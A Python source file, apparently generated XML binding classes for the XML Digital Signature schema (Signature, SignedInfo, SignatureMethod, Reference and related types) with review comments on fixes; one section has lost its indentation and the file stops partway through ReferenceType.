                    # Text after a child element goes in that child's tail.
                    if element[-1].tail is None:
                        element[-1].tail = self.value
                    else:
                        element[-1].tail += self.value
                else:
                    if element.text is None:
                        element.text = self.value
                    else:
                        element.text += self.value
        elif self.category == MixedContainer.CategorySimple:
            subelement = etree_.SubElement(element, '%s' % self.name)
            subelement.text = self.to_etree_simple()
        else:    # category == MixedContainer.CategoryComplex
            self.value.to_etree(element)

    def to_etree_simple(self):
        # String form of the scalar for ElementTree text nodes.
        if self.content_type == MixedContainer.TypeString:
            text = self.value
        elif (self.content_type == MixedContainer.TypeInteger or
                self.content_type == MixedContainer.TypeBoolean):
            text = '%d' % self.value
        elif (self.content_type == MixedContainer.TypeFloat or
                self.content_type == MixedContainer.TypeDecimal):
            text = '%f' % self.value
        elif self.content_type == MixedContainer.TypeDouble:
            text = '%g' % self.value
        elif self.content_type == MixedContainer.TypeBase64:
            text = '%s' % base64.b64encode(self.value)
        return text

    def exportLiteral(self, outfile, level, name):
        # Emit Python-literal construction code for this container.
        if self.category == MixedContainer.CategoryText:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type, self.name, self.value))
        elif self.category == MixedContainer.CategorySimple:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type, self.name, self.value))
        else:    # category == MixedContainer.CategoryComplex
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s",\n' % (
                    self.category, self.content_type, self.name,))
            self.value.exportLiteral(outfile, level + 1)
            showIndent(outfile, level)
            outfile.write(')\n')
class MemberSpec_(object):
    """Describes one member of a generated class: name, type chain, container flag."""

    def __init__(self, name='', data_type='', container=0):
        self.name = name
        self.data_type = data_type
        self.container = container

    def set_name(self, name):
        self.name = name

    def get_name(self):
        return self.name

    def set_data_type(self, data_type):
        self.data_type = data_type

    def get_data_type_chain(self):
        return self.data_type

    def get_data_type(self):
        """Return the effective type: last entry of a chain, else the scalar."""
        chain = self.data_type
        if not isinstance(chain, list):
            return chain
        return chain[-1] if chain else 'xs:string'

    def set_container(self, container):
        self.container = container

    def get_container(self):
        return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class SignatureType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Id=None, SignedInfo=None, SignatureValue=None, KeyInfo=None, Object=None):
self.Id = _cast(None, Id)
self.SignedInfo = SignedInfo
self.SignatureValue = SignatureValue
self.KeyInfo = KeyInfo
if Object is None:
self.Object = []
else:
self.Object = Object
def factory(*args_, **kwargs_):
if SignatureType.subclass:
return SignatureType.subclass(*args_, **kwargs_)
else:
return SignatureType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_SignedInfo(self): return self.SignedInfo
def set_SignedInfo(self, SignedInfo): self.SignedInfo = SignedInfo
def get_SignatureValue(self): return self.SignatureValue
def set_SignatureValue(self, SignatureValue): self.SignatureValue = SignatureValue
def get_KeyInfo(self): return self.KeyInfo
def set_KeyInfo(self, KeyInfo): self.KeyInfo = KeyInfo
def get_Object(self): return self.Object
def set_Object(self, Object): self.Object = Object
def add_Object(self, value): self.Object.append(value)
def insert_Object(self, index, value): self.Object[index] = value
def get_Id(self): return self.Id
def set_Id(self, Id): self.Id = Id
def hasContent_(self):
if (
self.SignedInfo is not None or
self.SignatureValue is not None or
self.KeyInfo is not None or
self.Object
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='SignatureType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignatureType'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
def exportChildren(self, outfile, level, namespace_='ds:', name_='SignatureType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.SignedInfo is not None:
self.SignedInfo.export(outfile, level, namespace_, name_='SignedInfo', pretty_print=pretty_print)
if self.SignatureValue is not None:
self.SignatureValue.export(outfile, level, namespace_, name_='SignatureValue', pretty_print=pretty_print)
if self.KeyInfo is not None:
self.KeyInfo.export(outfile, level, namespace_, name_='KeyInfo', pretty_print=pretty_print)
for Object_ in self.Object:
Object_.export(outfile, level, namespace_, name_='Object', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='SignatureType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
showIndent(outfile, level)
outfile.write('Id="%s",\n' % (self.Id,))
    def exportLiteralChildren(self, outfile, level, name_):
        """Write child objects as Python-literal keyword arguments."""
        if self.SignedInfo is not None:
            showIndent(outfile, level)
            outfile.write('SignedInfo=model_.SignedInfo(\n')
            self.SignedInfo.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.SignatureValue is not None:
            showIndent(outfile, level)
            outfile.write('SignatureValue=model_.SignatureValue(\n')
            self.SignatureValue.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.KeyInfo is not None:
            showIndent(outfile, level)
            outfile.write('KeyInfo=model_.KeyInfo(\n')
            self.KeyInfo.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        # The Object list is always written, even when empty.
        showIndent(outfile, level)
        outfile.write('Object=[\n')
        level += 1
        for Object_ in self.Object:
            showIndent(outfile, level)
            outfile.write('model_.Object(\n')
            Object_.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'SignedInfo':
obj_ = SignedInfoType.factory()
obj_.build(child_)
self.SignedInfo = obj_
elif nodeName_ == 'SignatureValue':
obj_ = SignatureValueType.factory()
obj_.build(child_)
self.SignatureValue = obj_
elif nodeName_ == 'KeyInfo':
obj_ = KeyInfoType.factory()
obj_.build(child_)
self.KeyInfo = obj_
elif nodeName_ == 'Object':
obj_ = ObjectType.factory()
obj_.build(child_)
self.Object.append(obj_)
# end class SignatureType
class SignatureValueType(GeneratedsSuper):
    """Generated binding for ds:SignatureValue: a text value with an
    optional Id attribute."""
    # Hook for a hand-written subclass; factory() instantiates it when set.
    subclass = None
    superclass = None
    def __init__(self, Id=None, valueOf_=None):
        # Id: optional XML attribute.  valueOf_: the element's text content.
        self.Id = _cast(None, Id)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        if SignatureValueType.subclass:
            return SignatureValueType.subclass(*args_, **kwargs_)
        else:
            return SignatureValueType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_Id(self): return self.Id
    def set_Id(self, Id): self.Id = Id
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # Only non-empty text counts as content.
        if (
            self.valueOf_
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='SignatureValueType', namespacedef_='', pretty_print=True):
        """Write this object to *outfile* as an XML element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureValueType')
        if self.hasContent_():
            # Text content is written inline between the tags.
            outfile.write('>')
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignatureValueType'):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='SignatureValueType', fromsubclass_=False, pretty_print=True):
        # No child elements in the schema for this type.
        pass
    def exportLiteral(self, outfile, level, name_='SignatureValueType'):
        """Write this object as a Python-literal constructor expression."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
    def exportLiteralChildren(self, outfile, level, name_):
        pass
    def build(self, node):
        """Populate this object from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        # Collect the element's flattened text content.
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Id', node)
        if value is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            self.Id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        pass
# end class SignatureValueType
class SignedInfoType(GeneratedsSuper):
    """Generated binding for ds:SignedInfo: CanonicalizationMethod,
    SignatureMethod, and one or more Reference children, plus an
    optional Id attribute."""
    # Hook for a hand-written subclass; factory() instantiates it when set.
    subclass = None
    superclass = None
    def __init__(self, Id=None, CanonicalizationMethod=None, SignatureMethod=None, Reference=None):
        self.Id = _cast(None, Id)
        self.CanonicalizationMethod = CanonicalizationMethod
        self.SignatureMethod = SignatureMethod
        # Fresh list per instance; never share a default list.
        if Reference is None:
            self.Reference = []
        else:
            self.Reference = Reference
    def factory(*args_, **kwargs_):
        if SignedInfoType.subclass:
            return SignedInfoType.subclass(*args_, **kwargs_)
        else:
            return SignedInfoType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_CanonicalizationMethod(self): return self.CanonicalizationMethod
    def set_CanonicalizationMethod(self, CanonicalizationMethod): self.CanonicalizationMethod = CanonicalizationMethod
    def get_SignatureMethod(self): return self.SignatureMethod
    def set_SignatureMethod(self, SignatureMethod): self.SignatureMethod = SignatureMethod
    def get_Reference(self): return self.Reference
    def set_Reference(self, Reference): self.Reference = Reference
    def add_Reference(self, value): self.Reference.append(value)
    # NOTE(review): "insert" here is index assignment, not list.insert;
    # this matches the convention used by the other generated classes.
    def insert_Reference(self, index, value): self.Reference[index] = value
    def get_Id(self): return self.Id
    def set_Id(self, Id): self.Id = Id
    def hasContent_(self):
        if (
            self.CanonicalizationMethod is not None or
            self.SignatureMethod is not None or
            self.Reference
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='SignedInfoType', namespacedef_='', pretty_print=True):
        """Write this object to *outfile* as an XML element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignedInfoType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignedInfoType'):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            outfile.write(' Id=%s' % (self.gds_format_string(quote_attrib(self.Id).encode(ExternalEncoding), input_name='Id'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='SignedInfoType', fromsubclass_=False, pretty_print=True):
        """Write children in schema order: CanonicalizationMethod,
        SignatureMethod, then each Reference."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.CanonicalizationMethod is not None:
            self.CanonicalizationMethod.export(outfile, level, namespace_, name_='CanonicalizationMethod', pretty_print=pretty_print)
        if self.SignatureMethod is not None:
            self.SignatureMethod.export(outfile, level, namespace_, name_='SignatureMethod', pretty_print=pretty_print)
        for Reference_ in self.Reference:
            Reference_.export(outfile, level, namespace_, name_='Reference', pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='SignedInfoType'):
        """Write this object as a Python-literal constructor expression."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.Id is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            showIndent(outfile, level)
            outfile.write('Id="%s",\n' % (self.Id,))
    def exportLiteralChildren(self, outfile, level, name_):
        if self.CanonicalizationMethod is not None:
            showIndent(outfile, level)
            outfile.write('CanonicalizationMethod=model_.CanonicalizationMethod(\n')
            self.CanonicalizationMethod.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        if self.SignatureMethod is not None:
            showIndent(outfile, level)
            outfile.write('SignatureMethod=model_.SignatureMethod(\n')
            self.SignatureMethod.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        # The Reference list is always written, even when empty.
        showIndent(outfile, level)
        outfile.write('Reference=[\n')
        level += 1
        for Reference_ in self.Reference:
            showIndent(outfile, level)
            outfile.write('model_.Reference(\n')
            Reference_.exportLiteral(outfile, level)
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this object from an ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Id', node)
        if value is not None and 'Id' not in already_processed:
            already_processed.add('Id')
            self.Id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'CanonicalizationMethod':
            obj_ = CanonicalizationMethodType.factory()
            obj_.build(child_)
            self.CanonicalizationMethod = obj_
        elif nodeName_ == 'SignatureMethod':
            obj_ = SignatureMethodType.factory()
            obj_.build(child_)
            self.SignatureMethod = obj_
        elif nodeName_ == 'Reference':
            obj_ = ReferenceType.factory()
            obj_.build(child_)
            self.Reference.append(obj_)
# end class SignedInfoType
class CanonicalizationMethodType(GeneratedsSuper):
    """Generated binding for ds:CanonicalizationMethod: mixed content
    with a required Algorithm attribute and arbitrary child elements.

    Fixes over the generated original:
    - insert_anytypeobjs_ wrote to ``self._anytypeobjs_`` (a nonexistent
      attribute) instead of ``self.anytypeobjs_``.
    - ``self.valueOf_`` was assigned twice in __init__.
    - a stray ``pass`` in exportLiteralChildren removed.
    """
    # Hook for a hand-written subclass; factory() instantiates it when set.
    subclass = None
    superclass = None
    def __init__(self, Algorithm=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.Algorithm = _cast(None, Algorithm)
        # Fresh list per instance; never share a default list.
        if anytypeobjs_ is None:
            self.anytypeobjs_ = []
        else:
            self.anytypeobjs_ = anytypeobjs_
        # valueOf_ holds the element's flattened text content.
        self.valueOf_ = valueOf_
        # mixedclass_ wraps mixed-content pieces (text and elements).
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
    def factory(*args_, **kwargs_):
        if CanonicalizationMethodType.subclass:
            return CanonicalizationMethodType.subclass(*args_, **kwargs_)
        else:
            return CanonicalizationMethodType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
    # Fixed: the generated original assigned into self._anytypeobjs_,
    # which does not exist (AttributeError on use).
    def insert_anytypeobjs_(self, index, value): self.anytypeobjs_[index] = value
    def get_Algorithm(self): return self.Algorithm
    def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        if (
            self.anytypeobjs_ or
            self.valueOf_
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='CanonicalizationMethodType', namespacedef_='', pretty_print=True):
        """Write this object to *outfile* as an XML element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='CanonicalizationMethodType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='CanonicalizationMethodType'):
        if self.Algorithm is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='CanonicalizationMethodType', fromsubclass_=False, pretty_print=True):
        # Mixed content: replay the recorded text/element pieces in order.
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='CanonicalizationMethodType'):
        """Write this object as a Python-literal constructor expression."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.Algorithm is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            showIndent(outfile, level)
            outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('content_ = [\n')
        for item_ in self.content_:
            item_.exportLiteral(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this object from an ElementTree *node*, recording
        mixed content (leading text plus each child and its tail)."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Algorithm', node)
        if value is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            self.Algorithm = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # NOTE(review): __ANY__ is a generateDS placeholder for xs:any
        # wildcard children; it looks undefined in this module — confirm
        # before relying on the nodeName_ == '' branch.
        if nodeName_ == '':
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
# end class CanonicalizationMethodType
class SignatureMethodType(GeneratedsSuper):
    """Generated binding for ds:SignatureMethod: mixed content with a
    required Algorithm attribute and an optional HMACOutputLength child.

    Fixes over the generated original:
    - insert_anytypeobjs_ wrote to ``self._anytypeobjs_`` (a nonexistent
      attribute) instead of ``self.anytypeobjs_``.
    - exportLiteralChildren emitted the ``content_`` list TWICE.
    - ``self.valueOf_`` was assigned twice in __init__.
    - py2-only ``except X, e`` rewritten as ``except X as e``
      (valid on Python 2.6+ and Python 3).
    """
    # Hook for a hand-written subclass; factory() instantiates it when set.
    subclass = None
    superclass = None
    def __init__(self, Algorithm=None, HMACOutputLength=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.Algorithm = _cast(None, Algorithm)
        self.HMACOutputLength = HMACOutputLength
        # Fresh list per instance; never share a default list.
        if anytypeobjs_ is None:
            self.anytypeobjs_ = []
        else:
            self.anytypeobjs_ = anytypeobjs_
        # valueOf_ holds the element's flattened text content.
        self.valueOf_ = valueOf_
        # mixedclass_ wraps mixed-content pieces (text and elements).
        if mixedclass_ is None:
            self.mixedclass_ = MixedContainer
        else:
            self.mixedclass_ = mixedclass_
        if content_ is None:
            self.content_ = []
        else:
            self.content_ = content_
    def factory(*args_, **kwargs_):
        if SignatureMethodType.subclass:
            return SignatureMethodType.subclass(*args_, **kwargs_)
        else:
            return SignatureMethodType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_HMACOutputLength(self): return self.HMACOutputLength
    def set_HMACOutputLength(self, HMACOutputLength): self.HMACOutputLength = HMACOutputLength
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
    # Fixed: the generated original assigned into self._anytypeobjs_,
    # which does not exist (AttributeError on use).
    def insert_anytypeobjs_(self, index, value): self.anytypeobjs_[index] = value
    def get_Algorithm(self): return self.Algorithm
    def set_Algorithm(self, Algorithm): self.Algorithm = Algorithm
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def validate_HMACOutputLengthType(self, value):
        # Validate type HMACOutputLengthType, a restriction on integer.
        pass
    def hasContent_(self):
        if (
            self.HMACOutputLength is not None or
            self.anytypeobjs_ or
            self.valueOf_
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='SignatureMethodType', namespacedef_='', pretty_print=True):
        """Write this object to *outfile* as an XML element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='SignatureMethodType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='SignatureMethodType'):
        if self.Algorithm is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            outfile.write(' Algorithm=%s' % (self.gds_format_string(quote_attrib(self.Algorithm).encode(ExternalEncoding), input_name='Algorithm'), ))
    def exportChildren(self, outfile, level, namespace_='ds:', name_='SignatureMethodType', fromsubclass_=False, pretty_print=True):
        # Mixed content: replay the recorded text/element pieces in order.
        if not fromsubclass_:
            for item_ in self.content_:
                item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='SignatureMethodType'):
        """Write this object as a Python-literal constructor expression."""
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('valueOf_ = """%s""",\n' % (self.valueOf_,))
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.Algorithm is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            showIndent(outfile, level)
            outfile.write('Algorithm="%s",\n' % (self.Algorithm,))
    def exportLiteralChildren(self, outfile, level, name_):
        # Fixed: the generated original wrote this content_ block twice,
        # duplicating every child in the literal output.
        showIndent(outfile, level)
        outfile.write('content_ = [\n')
        for item_ in self.content_:
            item_.exportLiteral(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        """Populate this object from an ElementTree *node*, recording
        mixed content (leading text plus each child and its tail)."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        if node.text is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', node.text)
            self.content_.append(obj_)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('Algorithm', node)
        if value is not None and 'Algorithm' not in already_processed:
            already_processed.add('Algorithm')
            self.Algorithm = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'HMACOutputLength' and child_.text is not None:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            obj_ = self.mixedclass_(MixedContainer.CategorySimple,
                MixedContainer.TypeInteger, 'HMACOutputLength', ival_)
            self.content_.append(obj_)
        elif nodeName_ == '':
            # NOTE(review): __ANY__ is a generateDS placeholder for xs:any
            # wildcard children; it looks undefined in this module — confirm.
            obj_ = __ANY__.factory()
            obj_.build(child_)
            obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
                MixedContainer.TypeNone, '', obj_)
            self.content_.append(obj_)
            if hasattr(self, 'add_'):
                self.add_(obj_.value)
            elif hasattr(self, 'set_'):
                self.set_(obj_.value)
        if not fromsubclass_ and child_.tail is not None:
            obj_ = self.mixedclass_(MixedContainer.CategoryText,
                MixedContainer.TypeNone, '', child_.tail)
            self.content_.append(obj_)
# end class SignatureMethodType
class ReferenceType(GeneratedsSuper):
    """Generated binding for ds:Reference: optional Transforms,
    DigestMethod, and a base64 DigestValue, with Type/Id/URI attributes.

    Fix over the generated original: py2-only ``except X, e`` rewritten
    as ``except X as e`` (valid on Python 2.6+ and Python 3).
    """
    # Hook for a hand-written subclass; factory() instantiates it when set.
    subclass = None
    superclass = None
    def __init__(self, Type=None, Id=None, URI=None, Transforms=None, DigestMethod=None, DigestValue=None):
        self.Type = _cast(None, Type)
        self.Id = _cast(None, Id)
        self.URI = _cast(None, URI)
        self.Transforms = Transforms
        self.DigestMethod = DigestMethod
        # DigestValue is stored as decoded binary (see buildChildren).
        self.DigestValue = DigestValue
    def factory(*args_, **kwargs_):
        if ReferenceType.subclass:
            return ReferenceType.subclass(*args_, **kwargs_)
        else:
            return ReferenceType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_Transforms(self): return self.Transforms
    def set_Transforms(self, Transforms): self.Transforms = Transforms
    def get_DigestMethod(self): return self.DigestMethod
    def set_DigestMethod(self, DigestMethod): self.DigestMethod = DigestMethod
    def get_DigestValue(self): return self.DigestValue
    def set_DigestValue(self, DigestValue): self.DigestValue = DigestValue
    def get_Type(self): return self.Type
    def set_Type(self, Type): self.Type = Type
    def get_Id(self): return self.Id
    def set_Id(self, Id): self.Id = Id
    def get_URI(self): return self.URI
    def set_URI(self, URI): self.URI = URI
    def hasContent_(self):
        if (
            self.Transforms is not None or
            self.DigestMethod is not None or
            self.DigestValue is not None
            ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='ds:', name_='ReferenceType', namespacedef_='', pretty_print=True):
        """Write this object to *outfile* as an XML element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='ReferenceType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
